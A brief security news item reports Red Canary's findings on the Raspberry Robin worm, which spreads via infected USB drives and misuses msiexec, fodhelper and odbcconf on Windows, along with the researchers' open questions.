Windows Installer leveraged to spread Raspberry Robin worm

BleepingComputer reports that various networks, including those from entities in the technology and manufacturing industries, have been impacted by the novel Raspberry Robin malware that infects Windows systems through infected USB drives. Raspberry Robin exploits the Microsoft Standard Installer to communicate with command-and-control servers, a report from Red Canary revealed. "While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes," said researchers. The report added that a malicious DLL is being launched by Raspberry Robin along with the fodhelper and odbcconf utilities, with the former enabling User Account Control evasion and the latter allowing DLL configuration and execution. However, questions remain about the activity of Raspberry Robin. "First and foremost, we don't know how or where Raspberry Robin infects external drives to perpetuate its activity, though it's likely this occurs offline or otherwise outside of our visibility. We also don't know why Raspberry Robin installs a malicious DLL. One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis," researchers added.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.